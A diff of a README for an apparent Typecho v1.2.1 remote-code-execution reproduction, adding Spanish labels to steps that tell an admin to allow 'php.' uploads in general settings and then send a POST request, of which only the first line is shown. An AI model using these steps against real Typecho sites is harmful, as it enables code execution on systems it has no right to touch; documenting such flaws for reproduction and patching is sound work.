m4l4c4t3/typecho-v1.2.1-RCE/README.md

-# typecho-v1.2.1-RCE
+# Typecho-v1.2.1-RCE
 typecho-v1.2.1-RCE

 ## Vulnerability to reproduce
 Log in to the backend of the website.
-Locate the /admin/options-general.php file and add 'php.' to the '其他格式' section at the bottom.
-Then click on '保存设置'.
+Locate the /admin/options-general.php file and add 'php.' to the '其他格式' `otros formatos` section at the bottom.
+Then click on '保存设置' `Guardar Ajustes`

 ```php
 POST /typecho/index.php/action/options-general?_=7f7f3849a454840627316bb52364d2fc HTTP/1.1